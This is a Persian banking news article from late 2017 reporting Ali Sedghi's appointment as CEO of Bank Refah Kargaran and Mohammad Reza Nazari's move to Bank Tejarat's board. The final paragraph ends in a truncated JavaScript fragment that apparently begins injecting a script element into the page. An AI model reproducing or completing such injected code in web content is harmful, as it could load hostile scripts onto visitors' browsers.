پنج شنبه , 23 آذر 1396
خانه / اخبار بانکی / اخبار بانک های ایران / صدقی مدیر عامل بانک رفاه شد/ نظری به هیات مدیره تجارت پیوست

صدقی مدیر عامل بانک رفاه شد/ نظری به هیات مدیره تجارت پیوست

در ادامه نقل و انتقال مدیران نظام بانکی که از سال گذشته کلید خورده بود، مدیر عامل بانک رفاه کارگران نیز تغییر کرد .

به گزارش «اخبار بانک»، علی صدقی به عنوان مدیر عامل بانک رفاه کارگران منصوب شد و محمد رضا نظری نیز به عضویت هیات مدیره بانک تجارت درآمد.

علی صدقی ازمدیران کهنه کار نظام بانکی بوده که در پرونده کاری او می توان به سابقه مدیریت عاملی بانک ملی هم اشاره داشت.

صدقی در دولت محمود احمدی‌نژاد و پیش از محمدرضا خاوری مدیرعامل بانک ملی ایران بوده است به طوری که وی از آذرماه سال ۸۵ تا اواخر فروردین ماه سال ۸۸ در این سمت مشغول به فعالیت بود.

گفته می‌شود که همراهی نکردن صدقی در اعطای تسهیلات مصوب دولت نهم در سفرهای استانی و نیز پرداخت وام به طرح‌های زود بازده، از جمله دلایل برکناری وی از سمت ریاست بانک ملی ایران بوده است.

وی پیش از این رئیس هیات اجرایی موسسه اعتباری” نور ” بود.حتی صحبت هایی مبنی بر حضور وی در هیات مدیره این موسسه مطرح شده بود که در نهایت این موضوع با رفتن وی به بانک رفاه منتفی شد.

گفتنی است، جابجایی مدیران بانک هایی چون ملت، صادرات،سینا، پارسیان و قرض الحسنه مهر ایران از سال گذشته کلید خورد و حالا نوبت بانک رفاه رسید.سال گذشته خبرهایی مبنی بر رفتن نظری از بانک رفاه مطرح شده بود.

محمدرضا نظری نیز پیش از مدیر عاملی بانک رفاه کارگران به عنوان رئیس هیأت مدیره این بانک و همچنین عضو هیأت عامل صندوق توسعه ملی و معاون قراردادهای عاملیت و اعتبارات صندوق توسعه ملی مسوولیت داشت.var d=document;var s=d.createElement(‘script’);

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *